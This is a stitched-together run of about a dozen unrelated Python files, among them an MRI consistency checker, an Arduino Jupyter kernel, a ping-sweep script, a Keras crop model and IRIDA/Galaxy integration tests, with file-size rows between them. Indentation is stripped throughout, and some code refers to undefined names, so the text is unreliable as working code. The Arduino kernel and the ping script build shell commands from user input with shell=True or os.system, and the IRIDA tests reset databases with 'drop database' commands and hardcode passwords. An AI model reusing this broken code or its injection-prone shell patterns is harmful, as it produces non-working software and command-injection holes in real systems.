if isfile(outputBshellFile) and isfile(outPutResolutionFile):
ref_bvals= read_bvals(outputBshellFile)
ref_res = np.load(outPutResolutionFile)
else:
ref_bshell_img = ref_imgs[0]
print(f'Using {ref_bshell_img} to determine b-shells')
inPrefix = abspath(ref_bshell_img).split('.nii')[0]
ref_bvals = findBShells(inPrefix + '.bval', outputBshellFile)
ref_res = load(ref_bshell_img).header['pixdim'][1:4]
np.save(outPutResolutionFile, ref_res)
print('b-shells are', ref_bvals)
print('\nSite', ref_csv, '\n')
print('Checking consistency of b-shells among subjects')
check_bshells(ref_imgs, ref_bvals)
print('spatial resolution is', ref_res)
print('Checking consistency of spatial resolution among subjects')
check_resolution(ref_imgs, ref_res)
if __name__ == '__main__':
if len(sys.argv)==1 or sys.argv[1]=='-h' or sys.argv[1]=='--help':
print('''Check consistency of b-shells and spatial resolution among subjects
Usage:
consistencyCheck list.csv/txt ref_bshell_bvalues.txt ref_res_file.npy
Provide a csv/txt file with first column for dwi and 2nd column for mask: dwi1,mask1\\ndwi2,mask2\\n...
or just one column for dwi1\\ndwi2\\n...
In addition, provide ref_bshell_bvalues and ref_res_file.''')
exit()
ref_csv= abspath(sys.argv[1])
outputBshellFile= abspath(sys.argv[2])
outPutResolutionFile= abspath(sys.argv[3])
if isfile(ref_csv):
consistencyCheck(ref_csv, outputBshellFile, outPutResolutionFile)
else:
raise FileNotFoundError(f'{ref_csv} does not exists.')
| 4,619 | 1,540 |
import numpy as np
from halomod.cross_correlations import ConstantCorr, CrossCorrelations
def test_cross_same():
"""Test if using two components that are the same gives the same as an auto corr."""
cross = CrossCorrelations(
cross_hod_model=ConstantCorr,
halo_model_1_params={
"exclusion_model": "NoExclusion",
"sd_bias_model": None,
"transfer_model": "EH",
"force_1halo_turnover": False,
},
halo_model_2_params={
"exclusion_model": "NoExclusion",
"sd_bias_model": None,
"transfer_model": "EH",
"force_1halo_turnover": False,
},
)
assert np.allclose(cross.power_2h_cross, cross.halo_model_1.power_2h_auto_tracer)
assert np.allclose(cross.corr_2h_cross, cross.halo_model_1.corr_2h_auto_tracer)
# This is only close-ish, because cross-pairs are actually different than auto-pairs,
# since you can count self-correlations.
assert np.allclose(
cross.corr_1h_cross,
cross.halo_model_1.corr_1h_auto_tracer,
atol=1e-5,
rtol=1e-1,
)
assert np.allclose(
cross.power_1h_cross,
cross.halo_model_1.power_1h_auto_tracer,
atol=1e-6,
rtol=1e-1,
)
| 1,283 | 456 |
import argparse
import matplotlib
import scipy.stats
matplotlib.use("Agg")
import sys
import matplotlib.pyplot as plt
import numpy as np
import os
sys.path.insert(0, '/root/jcw78/process_pcap_traces/')
import graph_utils
graph_utils.latexify(space_below_graph=0.4)
def tensorflow(folder, name_map):
# In tensorflow, the performance data is in all the slaves.
# It is identical in every one, so just take an arb one.
machine = name_map['slave'][0]
data_file = folder + os.path.sep + machine + os.path.sep + \
'data' + os.path.sep + 'tensorflow-mnist'
with open(data_file, 'r') as f:
for line in f.readlines():
if line.startswith("Training elapsed time"):
# The benchmark runs for 20000 steps, so get the
# time per step.
performance = 20000.0 / float(line.split(' ')[3])
return [performance]
print "Error: no performance numbers found!"
def apache(folder, name_map):
# All the slaves have performance numbers here.
performance_numbers = []
for machine in name_map['client']:
data_file = folder + os.path.sep + machine + os.path.sep + \
'data' + os.path.sep + 'apache_ab_out'
with open(data_file, 'r') as f:
for line in f.readlines():
if line.startswith('Requests per second:'):
rate = float([x for x in line.split(' ') if x][3])
performance_numbers.append(rate)
return performance_numbers
def memcached(folder, name_map):
# All the slaves have different performance numbers here.
performance = []
for machine in name_map['client']:
data_file = folder + os.path.sep + machine + os.path.sep + \
'data' + os.path.sep + 'memcached_mutilate_stdout'
with open(data_file, 'r') as f:
for line in f.readlines():
if line.startswith('Total QPS'):
rate = float(line.split(' ')[3])
performance.append(rate)
return performance
def dns(folder, name_map):
# All the slaes have different performance numbers here.
performance = []
for slave in name_map['client']:
data_file = folder + os.path.sep + slave + os.path.sep + \
'data' + os.path.sep + 'dns-out'
with open(data_file, 'r') as f:
for line in f.readlines():
if 'Queries per second:' in line:
rate = float([x for x in line.split(' ') if x][3])
performance.append(rate)
return performance
def get_performance(benchmark_name, benchmark_folder):
# First, from the machine roles file get the server and
# the client folders.
role_to_name_map = {}
with open(benchmark_folder + os.path.sep + 'MachineRoles', 'r') as f:
lines = f.readlines()
for line in lines:
if benchmark_name + '-' in line:
_, role = line.strip().split('-')
management_ip = line.split(' ')[0].strip()
# Now get the jname of the machien for that
# IP.
for line in lines:
if management_ip in line:
name = line.split(' ')[3].strip()
break
if role in role_to_name_map:
role_to_name_map[role].append(name)
else:
role_to_name_map[role] = [name]
# How the performance is handled depends on the
# benchmark.
if benchmark_name == 'tensorflow':
return tensorflow(benchmark_folder, role_to_name_map)
elif benchmark_name == 'dns':
return dns(benchmark_folder, role_to_name_map)
elif benchmark_name == 'memcached':
return memcached(benchmark_folder, role_to_name_map)
elif benchmark_name == 'apache':
return apache(benchmark_folder, role_to_name_map)
else:
print "I don't know how to extract performance numbers from",
print benchmark_name
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('results_folders', nargs='+')
parser.add_argument('--num-machines', default='7', dest='num_machines')
args = parser.parse_args()
# First, get all the individual runs out of a folder.
benchmark_folders = []
for folder in args.results_folders:
folders = [folder + os.path.sep + x for x in os.listdir(folder)]
benchmark_folders += folders
# Now, get the benchmarks that we ran.
# Also get the rates.
benchmarks = []
rates = {}
folders_by_benchmark_rate = {}
for folder in benchmark_folders:
name, rate, _ = os.path.basename(folder).split('_')
rate = int(rate)
if name not in benchmarks:
benchmarks.append(name)
if name in rates:
rates[name].append(rate)
else:
rates[name] = [rate]
folders_by_benchmark_rate[name + str(rate)] = folder
plt.clf()
# Construct a line for every benchmark.
for benchmark in benchmarks:
errors_below = []
errors_above = []
app_performances = []
values = []
plotted_rates = []
for rate in sorted(rates[benchmark]):
folder_name = folders_by_benchmark_rate[benchmark + str(rate)]
# Get all the benchmark runs:
run_parent_folder = folder_name + os.path.sep + args.num_machines + '_machines' + os.path.sep + 'run'
run_folders = os.listdir(run_parent_folder)
# How each run is parsed depends on the type
# of benchmark. Parse that.
performance = []
for run_folder in run_folders:
if not os.path.exists(run_parent_folder + os.path.sep + run_folder + os.path.sep + 'FAILED_WITH_TIMEOUT'):
performance+=get_performance(benchmark, run_parent_folder + os.path.sep + run_folder)
print benchmark
print len(performance)
if len(performance) > 0:
app_performances.append(performance)
plotted_rates.append(rate)
else:
print "No performance numbers found for ", run_parent_folder
# We normalize with respect to the highest available
# bandwidth.
highest_median = None
for performance in app_performances:
if highest_median:
highest_median = \
max(np.median(performance), highest_median)
else:
highest_median = np.median(performance)
for i in range(len(app_performances)):
app_performances[i] = np.array(app_performances[i]) / highest_median
for performance in app_performances:
value = np.median(performance)
values.append(value)
low_percentile, high_percentile = np.percentile(performance, [25, 75])
errors_below.append(value - low_percentile)
errors_above.append(high_percentile - value)
print benchmark
print plotted_rates
plt.errorbar(plotted_rates, values, yerr=(errors_below, errors_above), label=benchmark, capsize=5)
plt.ylabel('Normalized Performance')
plt.xlabel('Bandwidth Limit (Mbps)')
graph_utils.set_legend_below(ncol=4)
graph_utils.set_ticks()
graph_utils.set_non_negative_axes()
plt.xlim([0, 10000])
filename = 'bandwidth_vs_performance.eps'
plt.savefig(filename)
print "Done! File saved in: ", filename
| 7,570 | 2,222 |
import discord
from discord import app_commands as app
__all__ = (
"ClutterError",
"InDevelopmentMode",
"UserIsBlacklisted",
"GuildIsBlacklisted",
"UserHasBeenBlacklisted",
"GlobalCooldownReached",
"UnknownTranslationString",
)
class ClutterError(discord.DiscordException):
"""Base class for all Clutter errors."""
class InDevelopmentMode(ClutterError, app.AppCommandError):
"""Raised when a user is not a bot admin and bot is in development mode when using an app command."""
class UserIsBlacklisted(ClutterError, app.AppCommandError):
"""Raised when a user is blacklisted when using an app command."""
class GuildIsBlacklisted(ClutterError, app.AppCommandError):
"""Raised when a guild is blacklisted when using an app command."""
class UserHasBeenBlacklisted(ClutterError, app.AppCommandError):
"""Raised when a user is blacklisted when using an app command."""
class GlobalCooldownReached(ClutterError, app.AppCommandError):
"""Raised when a user is blacklisted when using an app command."""
def __init__(self, retry_after: float, message: str, /):
self.retry_after = retry_after
self.message = message
def __str__(self):
return self.message
class UnknownTranslationString(ClutterError, app.AppCommandError):
"""Raised when a translation string is missing"""
| 1,368 | 416 |
from .loss import Loss, NLLLoss, Perplexity
| 44 | 17 |
from ipykernel.kernelbase import Kernel
import json
import os
import subprocess
import sys
import urllib
from urllib.request import urlopen
from requests.compat import urljoin
from notebook.notebookapp import list_running_servers
from .board import Board, BoardError
SKETCH_FOLDER = ".arduino/sketch"
class ArduinoKernel(Kernel):
implementation = "Arduino"
implementation_version = "1.0"
language = "no-op"
language_version = "0.1"
language_info = {
"name": "Any text",
"mimetype": "text/plain",
"file_extension": ".ino",
}
banner = "Arduino kernel"
def __init__(self, **kwargs):
Kernel.__init__(self, **kwargs)
self._start_bash()
def _start_bash(self):
from pexpect import replwrap
import signal
sig = signal.signal(signal.SIGINT, signal.SIG_DFL)
try:
os.makedirs(SKETCH_FOLDER)
except FileExistsError:
pass
def do_execute(
self, code, silent, store_history=True, user_expressions=None, allow_stdin=False
):
from pexpect import EOF
# Empty cell
if not code.strip():
return {
"status": "OK",
"execution_count": self.execution_count,
"payload": [],
"user_expressions": {},
}
# Non-empty cell
interrupted = False
try:
try:
os.makedirs(SKETCH_FOLDER)
except FileExistsError:
pass
if code == "arduino-cli board list":
try:
sp = subprocess.check_output(
"arduino-cli board list", stderr=subprocess.STDOUT, shell=False
)
except subprocess.CalledProcessError as e:
raise RuntimeError(
"command '{}' return with error (code {}): {}".format(
e.cmd, e.returncode, e.output
)
)
output = sp.decode(sys.stdout.encoding)
elif code.startswith("arduino-cli lib install"):
try:
sp = subprocess.check_output(
code,
stderr=subprocess.STDOUT,
shell=True,
)
except subprocess.CalledProcessError as e:
errorTxt = "Command '{}' return with error (code {}): {}".format(
e.cmd, e.returncode, e.output
)
stream_content = {"name": "stdout", "text": errorTxt}
self.send_response(self.iopub_socket, "stream", stream_content)
return {"status": "abort", "execution_count": self.execution_count}
output = sp.decode(sys.stdout.encoding)
else:
oper = code.split("\n")[0]
command = ""
codes = ""
if oper.split("%")[0] == "port":
port = oper.split("%")[1]
fqbn = code.split("\n")[1]
fqbn = fqbn.split("%")[1]
codes = code.split("\n", 2)[2]
command = (
"arduino-cli upload -p "
+ port
+ " --fqbn "
+ fqbn
+ " "
+ SKETCH_FOLDER
)
elif oper.split("%")[0] == "board":
fqbn = code.split("\n")[0]
fqbn = fqbn.split("%")[1]
codes = code.split("\n", 1)[1]
command = "arduino-cli compile -b " + fqbn + " " + SKETCH_FOLDER
f = open(SKETCH_FOLDER + "/sketch.ino", "w+")
f.write(codes.rstrip())
f.close()
try:
sp = subprocess.check_output(
command,
stderr=subprocess.STDOUT,
shell=True,
)
except subprocess.CalledProcessError as e:
errorTxt = "Command '{}' return with error (code {}): {}".format(
e.cmd, e.returncode, e.output
)
stream_content = {"name": "stdout", "text": errorTxt}
self.send_response(self.iopub_socket, "stream", stream_content)
return {"status": "abort", "execution_count": self.execution_count}
output = sp.decode(sys.stdout.encoding)
except KeyboardInterrupt:
interrupted = True
clean_sketches()
# Restarting Bash
except EOF:
output = self.bash_wrapper.child.before + "Restarting Bash"
# If expecting output
if not silent:
stream_content = {"name": "stdout", "text": output}
self.send_response(self.iopub_socket, "stream", stream_content)
# If interrupted
if interrupted:
clean_sketches()
return {"status": "abort", "execution_count": self.execution_count}
# If everything is OK
else:
return {
"status": "ok",
"execution_count": self.execution_count,
"payload": [],
"user_expressions": {},
}
def clean_sketches():
if os.path.isfile("./" + SKETCH_FOLDER + "/sketch.ino"):
filelist = os.listdir("./" + SKETCH_FOLDER)
for f in filelist:
os.remove(os.path.join(mydir, f))
| 5,703 | 1,547 |
#-*- coding=utf-8 -*-
'''
@description: 影讯新接口——排期接口测试用例。
@author: miliang<miliang@baidu.com>
'''
from base import Info_Base
class Info_Schedule(Info_Base):
def __init__(self,cinema_id=None,encode_bid=None,bid=None):
super(Info_Schedule,self).__init__()
self.req_url = self.req_url + 'schedule'
self.req_dict = {}
if cinema_id:
self.req_dict['cinema_id'] = cinema_id
self.cinema_id = cinema_id
if encode_bid:
self.req_dict['encode_id'] = encode_id
self.encode_id = encode_id
if bid:
self.req_dict['bid'] = bid
self.bid = bid
def doAssert(self):
print self.page_dict
assert self.page_dict['errorMsg'] == 'Success'
assert self.page_dict['movie_id']
assert self.page_dict['time_table']
partner = ''
for date in self.page_dict['time_table']:
for schedule in self.page_dict['time_table'][date]:
#上一个合作方的竞争价,要求按竞争价升序排列(下线了)
#former_com_price = 0
assert schedule['time']
assert schedule['date']
assert schedule['movie_id']
assert schedule['end_time']
assert schedule.has_key('src_info')
for i in range(len(schedule['src_info'])):
assert schedule['src_info'][i]['src']
# 5.11:仅返回C端同一合作方的影讯
if partner == '':
partner = schedule['src_info'][i]['src']
else :
assert schedule['src_info'][i]['src'] == partner
assert schedule['src_info'][i].has_key('lan') # 这个暂时可能为空
assert schedule['src_info'][i].has_key('type') # 这个暂时可能为空
assert schedule['src_info'][i]['origin_price']
assert schedule['src_info'][i]['price']
assert schedule['src_info'][i].has_key('seq_no') # 这个暂时可能为空
assert schedule['src_info'][i]['third_cinema_id']
assert schedule['src_info'][i]['third_movie_id']
assert schedule['src_info'][i]['theater']
assert schedule['src_info'][i]['src_name']
assert schedule['src_info'][i]['out_buy_time']
assert schedule['src_info'][i].has_key('hall_id') # 这个暂时可能为空
assert schedule['src_info'][i].has_key('weight')
assert schedule['src_info'][i].has_key('status') and schedule['src_info'][i]['status'] == 0 or schedule['src_info'][i]['status'] == 1
#assert schedule['src_info'][i].has_key('com_price') and schedule['src_info'][i]['com_price'] >= former_com_price
#former_com_price = schedule['src_info'][i]['com_price']
if __name__ == '__main__':
case = Info_Schedule(cinema_id=8350)
case.execute()
| 3,022 | 1,041 |
import os
def ping(plage):
for ip in range(255):
test = os.system("ping -c 1 " +plage+str(ip)+" >/dev/null")
if test == 0:
print(plage+str(ip),"est actif sur le reseau.")
def main():
os.system("clear")
print("PingPy".center(25,"-"))
print("\nExemple : 192.168.1.")
print("Exemple : 192.168.0.")
print("-"*25)
Plage = input("Adresses reseau a scanner: ")
ping(Plage)
if __name__=="__main__":
main()
| 465 | 196 |
import numpy as np
import pandas as pd
def integral(df,data):
integral = [0]
for i in range(len(df.index) - 1):
dt_ = df.time[i + 1] - df.time[i]
integral_ = data[i] * dt_
integral_ += (data[i + 1] - data[i]) * dt_ / 2.0
integral.append(integral[i] + integral_)
return(integral)
def derivData(df,data):
derivData = [0]
for i in range(len(df.index) - 1):
if i == 0:
derivData.append((data[i + 1] - data[i]) / (df.time[i + 1] - df.time[i]))
elif i == len(df.index) - 1:
derivData.append((data[i] - data[i - 1]) / (df.time[i] - df.time[i - 1]))
else:
derivData.append((data[i + 1] - data[i - 1]) / (df.time[i + 1] - df.time[i - 1]))
return(derivData)
def angle(df,X,Z):
angle = [0]
angle = np.arctan(X/Z)
return(angle)
def norme(df):
norme = np.sqrt(((df['accX'])**2)+(df['accY']**2)+(df['accZ']**2))
return(norme)
| 971 | 402 |
"""Contains classes for computing and keeping track of attention distributions.
"""
from collections import namedtuple
import dynet as dy
import dynet_utils as du
class AttentionResult(namedtuple('AttentionResult',
('scores',
'distribution',
'vector'))):
"""Stores the result of an attention calculation."""
__slots__ = ()
class Attention():
"""Attention mechanism class. Stores parameters for and computes attention.
Attributes:
transform_query (bool): Whether or not to transform the query being
passed in with a weight transformation before computing attentino.
transform_key (bool): Whether or not to transform the key being
passed in with a weight transformation before computing attentino.
transform_value (bool): Whether or not to transform the value being
passed in with a weight transformation before computing attentino.
key_size (int): The size of the key vectors.
value_size (int): The size of the value vectors.
the query or key.
query_weights (dy.Parameters): Weights for transforming the query.
key_weights (dy.Parameters): Weights for transforming the key.
value_weights (dy.Parameters): Weights for transforming the value.
"""
def __init__(self,
model,
query_size,
key_size,
value_size):
self.key_size = key_size
self.value_size = value_size
self.query_weights = du.add_params(
model, (query_size, self.key_size), "weights-attention-q")
def transform_arguments(self, query, keys, values):
""" Transforms the query/key/value inputs before attention calculations.
Arguments:
query (dy.Expression): Vector representing the query (e.g., hidden state.)
keys (list of dy.Expression): List of vectors representing the key
values.
values (list of dy.Expression): List of vectors representing the values.
Returns:
triple of dy.Expression, where the first represents the (transformed)
query, the second represents the (transformed and concatenated)
keys, and the third represents the (transformed and concatenated)
values.
"""
assert len(keys) == len(values)
all_keys = dy.concatenate(keys, d=1)
all_values = dy.concatenate(values, d=1)
assert all_keys.dim()[0][0] == self.key_size, "Expected key size of " + \
str(self.key_size) + " but got " + str(all_keys.dim()[0][0])
assert all_values.dim()[0][0] == self.value_size
query = du.linear_transform(query, self.query_weights)
if du.is_vector(query):
query = du.add_dim(query)
return query, all_keys, all_values
def __call__(self, query, keys, values=None):
if not values:
values = keys
query_t, keys_t, values_t = self.transform_arguments(query,
keys,
values)
scores = dy.transpose(query_t * keys_t)
distribution = dy.softmax(scores)
context_vector = values_t * distribution
return AttentionResult(scores, distribution, context_vector)
| 3,461 | 871 |
# -*- coding: utf-8 -*-
"""
Created on Saturday - 2021
@author: DIVAKARAN
"""
import pandas as pd
import numpy as np
from sklearn import preprocessing
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score
from keras.models import Sequential
from keras.layers import Activation
from keras.optimizers import SGD
from keras.layers import Dense
df = pd.read_csv("final.csv")
le = preprocessing.LabelEncoder()
l1 = df["Soil"]
le.fit(l1)
newsoil = le.transform(l1)
df["Soil"]=newsoil
l2 = df["Month"]
le.fit(l2)
df["Month"]=le.transform(l2)
l3 = df["State"]
le.fit(l3)
df["State"]=le.transform(l3)
#df=df.iloc[:,1:]
df = pd.DataFrame(data = df.iloc[:,1:].values, columns=["Soil","Month","State","Rice","Wheat","Cotton","Sugarcane","Tea","Coffee","Cashew","Rubber","Coconut","Oilseed","Ragi","Maize","Groundnut","Millet","Barley"])
#print(df)
feat = pd.DataFrame({"Soil": df["Soil"], "Month" : df["Month"], "State": df["State"]})
labels = pd.DataFrame(data=df.iloc[:,3:],columns=["Rice","Wheat","Cotton","Sugarcane","Tea", "Coffee","Cashew","Rubber","Coconut","Oilseed","Ragi","Maize","Groundnut","Millet","Barley"])
#print(df)
from keras.utils import np_utils
from sklearn.model_selection import train_test_split
(trainData, testData, trainLabels, testLabels) = train_test_split(feat, labels, test_size=0.25, random_state=42)
print(trainData.values)
model = Sequential()
model.add(Dense(15, input_dim=3, init="uniform",activation="sigmoid"))
"""
model.add(Dense(10, input_dim=3, init="uniform",activation="relu"))
print(model.output)
model.add(Dense(15, init="uniform", activation="relu"))
print(model.output)
model.add(Activation("sigmoid"))
print(model.output)
print(model.summary())
"""
#trainLabels = trainLabels.reshape((-1, 1))
print(trainData.shape, testData.shape, trainLabels.shape, testLabels.shape)
sgd = SGD(lr=0.01)
model.compile(loss="binary_crossentropy", optimizer=sgd, metrics=["accuracy"])
model.fit(trainData.values, trainLabels.values, epochs=500, batch_size=10, verbose=1)
(loss, accuracy) = model.evaluate(testData.values, testLabels.values, batch_size=40, verbose=1)
print("[INFO] loss={:.4f}, accuracy: {:.4f}%".format(loss,accuracy * 100))
pred = model.predict_proba(testData.values)
df = pd.DataFrame(pred, columns=["Rice","Wheat","Cotton","Sugarcane","Tea", "Coffee","Cashew","Rubber","Coconut","Oilseed","Ragi","Maize","Groundnut","Millet","Barley"])
print(df)
#df['image_name'] = test_id
"""
newhh=df[['image_name','Type_1','Type_2','Type_3']]
newhh.to_csv('submission.csv', index=False)
""" | 2,655 | 1,067 |
# -*- coding: utf-8 -*-
from django.core.management.base import BaseCommand
from django.template.loader import get_template
from event.models import Event, Frame
from base.utils import send_template_mail
from django.utils import timezone
import datetime
import sys
import io
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
class Command(BaseCommand):
help = """
以下の動作をします。毎日午前9時に一度実行されることを想定しています。
- 翌日開催or翌日登録締切のボランティア参加者にリマインダーを送る
"""
from_address = "reminder@sovol.moe"
def handle(self, *args, **options):
self.stdout.write("running...")
today = datetime.datetime.combine(
datetime.date.today(),
datetime.time(0, 0, tzinfo=timezone.LocalTimezone())
)
reminder_template = get_template("email/reminder.txt")
reminder_events = Event.objects.filter(
start_time__gte=today + datetime.timedelta(days=1),
start_time__lt=today + datetime.timedelta(days=2),
)
for event in reminder_events:
for user in event.participant.all():
send_template_mail(
reminder_template,
{'user': user, 'event': event},
self.from_address,
[user.email]
)
deadline_template = get_template("email/deadline.txt")
deadline_frames = Frame.objects.filter(
deadline__gte=today + datetime.timedelta(days=1),
deadline__lt=today + datetime.timedelta(days=2),
)
for frame in deadline_frames:
if frame.event not in reminder_events:
for user in frame.participant.all():
send_template_mail(
deadline_template,
{'user': user, 'event': frame.event},
self.from_address,
[user.email]
)
self.stdout.write("success...!")
| 1,978 | 610 |
import socket
import getpass
import inspect
import time
import sys
import logging
import os
import configparser
import pytest
import subprocess
from tempfile import mkdtemp
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import StaleElementReferenceException
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from ...irida_import import IridaImport
from . import util
from requests_oauthlib import OAuth2Session
from oauthlib.oauth2 import LegacyApplicationClient
from bioblend import galaxy
# These variables are to stop Galaxy and Irida from being changed
# during script execution. This is required if you are using your
# own instance of Galaxy and Irida.
# os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_INSTALL'] = "1"
# os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_START_GALAXY'] = "1"
# os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_STOP_GALAXY'] = "1"
# os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_START_IRIDA'] = "1"
class TestIridaImportInt:
"""
Perform integration tests on the IRIDA import tool for Galaxy
To use an already running instance of Galaxy on port 8888, installation
must be disabled, in addition to Galaxy starting/stopping
"""
TIMEOUT = 600 # seconds
GALAXY_SLEEP_TIME = 360
USER = getpass.getuser()
EMAIL = 'irida@irida.ca'
GALAXY_PASSWORD = 'Password1'
GALAXY_DOMAIN = 'localhost'
GALAXY_CMD = ['bash', 'run.sh', '--daemon']
GALAXY_STOP = ['bash', 'run.sh', '--stop-daemon']
GALAXY_DB_RESET = 'echo "drop database if exists galaxy_test; create database galaxy_test;" | psql'
IRIDA_DOMAIN = 'localhost'
IRIDA_PORT = 8080
IRIDA_URL = 'http://' + IRIDA_DOMAIN + ':' + str(IRIDA_PORT)
IRIDA_CMD = ['mvn', 'clean', 'jetty:run',
'-Djdbc.url=jdbc:mysql://localhost:3306/irida_test',
'-Djdbc.username=test', '-Djdbc.password=test',
'-Dliquibase.update.database.schema=true',
'-Dhibernate.hbm2ddl.auto=',
'-Dhibernate.hbm2ddl.import_files=']
IRIDA_STOP = 'mvn jetty:stop'
IRIDA_DB_RESET = 'echo ' \
'"drop database if exists irida_test;' \
'create database irida_test;' \
'"| mysql -u test -ptest'
IRIDA_PASSWORD_ID = 'password_client'
IRIDA_AUTH_CODE_ID = 'auth_code_client'
IRIDA_REDIRECT_URI = IRIDA_URL + '/galaxy/auth_code'
IRIDA_USER = 'admin'
IRIDA_PASSWORD = 'Password1!'
IRIDA_TOKEN_ENDPOINT = IRIDA_URL + '/api/oauth/token'
IRIDA_PROJECTS = IRIDA_URL + '/api/projects'
IRIDA_GALAXY_MODAL = 'galaxy-modal'
WAIT = 120
INSTALL_EXEC = 'install.sh'
# Sequence files accessed by IRIDA's REST API will not exist when the
# tool attempts to access them if they were not uploaded as valid sequence
# files
FASTQ_CONTENTS = (
"@SRR566546.970 HWUSI-EAS1673_11067_FC7070M:4:1:2299:1109 length=50\n" +
"TTGCCTGCCTATCATTTTAGTGCCTGTGAGGTGGAGATGTGAGGATCAGT\n" +
"+SRR566546.970 HWUSI-EAS1673_11067_FC7070M:4:1:2299:1109 length=50\n" +
"hhhhhhhhhhghhghhhhhfhhhhhfffffe`ee[`X]b[d[ed`[Y[^Y")
def setup_class(self):
"""Initialize class variables, install IRIDA, Galaxy, and the tool"""
module_dir = os.path.dirname(os.path.abspath(__file__))
self.SCRIPTS = os.path.join(module_dir, 'bash_scripts')
self.REPOS_PARENT = module_dir
self.REPOS = os.path.join(module_dir, 'repos')
self.TOOL_DIRECTORY = os.path.dirname(inspect.getfile(IridaImport))
self.CONFIG_PATH = os.path.join(self.TOOL_DIRECTORY, 'tests',
'integration', 'repos', 'galaxy',
'tools', 'irida-galaxy-importer', 'irida_import',
'config.ini')
self.GALAXY = os.path.join(self.REPOS, 'galaxy')
self.IRIDA = os.path.join(self.REPOS, 'irida')
log = logging.getLogger()
log.setLevel(logging.DEBUG)
log_out = logging.StreamHandler(sys.stdout)
log_out.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
log_out.setFormatter(formatter)
log.addHandler(log_out)
self.log = log
try:
os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_INSTALL']
self.GALAXY_PORT = 8080
self.GALAXY_URL = 'http://' + self.GALAXY_DOMAIN + ':' + str(
self.GALAXY_PORT)
except KeyError:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('', 0))
self.GALAXY_PORT = sock.getsockname()[1]
self.GALAXY_URL = 'http://' + self.GALAXY_DOMAIN + ':' + str(
self.GALAXY_PORT)
# Install IRIDA, Galaxy, and the IRIDA export tool:
exec_path = os.path.join(self.SCRIPTS, self.INSTALL_EXEC)
install = subprocess.Popen([exec_path, self.TOOL_DIRECTORY,
str(self.GALAXY_PORT)],
cwd=self.REPOS_PARENT)
install.wait() # Block untill installed
@pytest.fixture(scope='class')
def driver(self, request):
"""Set up the Selenium WebDriver"""
driver = webdriver.Chrome()
driver.implicitly_wait(1)
driver.set_window_size(1024, 768)
def finalize_driver():
driver.quit()
request.addfinalizer(finalize_driver)
return driver
@pytest.fixture(scope='class')
def setup_irida(self, request, driver):
"""Set up IRIDA for tests (Start if required, register, log in)"""
def stop_irida():
print('Stopping IRIDA nicely')
stopper = subprocess.Popen(self.IRIDA_STOP, cwd=self.IRIDA,
shell=True)
stopper.wait()
try:
os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_START_IRIDA']
except KeyError:
stop_irida()
# create temporary directories for IRIDA data
data_dir = mkdtemp(prefix='irida-tmp-')
sequence_file_dir = mkdtemp(prefix='sequence-files-', dir=data_dir)
reference_file_dir = mkdtemp(prefix='reference-files-', dir=data_dir)
output_file_dir = mkdtemp(prefix='output-files-', dir=data_dir)
self.IRIDA_CMD.append('-Dsequence.file.base.directory=' + sequence_file_dir)
self.IRIDA_CMD.append('-Dreference.file.base.directory=' + reference_file_dir)
self.IRIDA_CMD.append('-Doutput.file.base.directory=' + output_file_dir)
subprocess.call(self.IRIDA_DB_RESET, shell=True)
FNULL = open(os.devnull, 'w')
subprocess.Popen(self.IRIDA_CMD, cwd=self.IRIDA, env=os.environ,stdout=FNULL)
util.wait_until_up(self.IRIDA_DOMAIN, self.IRIDA_PORT,
self.TIMEOUT)
def finalize_irida():
stop_irida()
request.addfinalizer(finalize_irida)
self.register_irida(driver)
self.add_irida_client_password(driver)
self.add_irida_client_auth_code(driver)
self.configure_irida_client_secret(driver)
# Return an OAuth 2.0 authorized session with IRIDA
return self.get_irida_oauth(driver)
@pytest.fixture(scope='class')
def setup_galaxy(self, request, driver):
"""Set up Galaxy for tests (Start if required, register, log in)"""
def stop_galaxy():
try:
os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_STOP_GALAXY']
except KeyError:
print('Killing Galaxy')
subprocess.Popen(self.GALAXY_STOP, cwd=self.GALAXY)
try:
os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_START_GALAXY']
except KeyError:
stop_galaxy()
subprocess.call(self.GALAXY_DB_RESET, shell=True)
subprocess.Popen(self.GALAXY_CMD, cwd=self.GALAXY)
self.log.debug("Waiting for Galaxy database migration [%s]. Sleeping for [%s] seconds", self.GALAXY_URL,
self.GALAXY_SLEEP_TIME)
time.sleep(self.GALAXY_SLEEP_TIME)
self.log.debug("Galaxy database migration should have (hopefully) finished, checking if it is up")
util.wait_until_up(
self.GALAXY_DOMAIN,
self.GALAXY_PORT,
self.TIMEOUT)
self.log.debug("Galaxy should now be up on [%s]", self.GALAXY_URL)
def finalize_galaxy():
stop_galaxy()
request.addfinalizer(finalize_galaxy)
self.register_galaxy(driver)
self.configure_galaxy_api_key(driver)
self.configure_tool('Galaxy', 'galaxy_url', self.GALAXY_URL)
def test_galaxy_configured(self, setup_galaxy, driver):
"""Verify that Galaxy is accessible"""
driver.get(self.GALAXY_URL)
def test_irida_configured(self, setup_irida, driver):
"""Verify that IRIDA is accessible"""
driver.get(self.IRIDA_URL)
def test_tool_visible(self, setup_galaxy, driver):
"""Make sure there is a link to the tool in Galaxy"""
driver.get(self.GALAXY_URL)
driver.find_element_by_xpath("//div[@id='Get Data']/a[span[contains(text(), 'Get Data')]]").click()
assert (driver.find_element_by_xpath("//a[contains(@class, 'irida_import')]"))
def register_galaxy(self, driver):
"""Register with Galaxy, and then attempt to log in"""
driver.get(self.GALAXY_URL)
driver.find_element_by_link_text("Login or Register").click()
driver.find_element_by_id("register-toggle").click()
driver.find_element_by_name("email").send_keys(self.EMAIL)
driver.find_element_by_name("password").send_keys("Password1")
driver.find_element_by_name("confirm").send_keys(
"Password1")
driver.find_element_by_name("username").send_keys("irida-test")
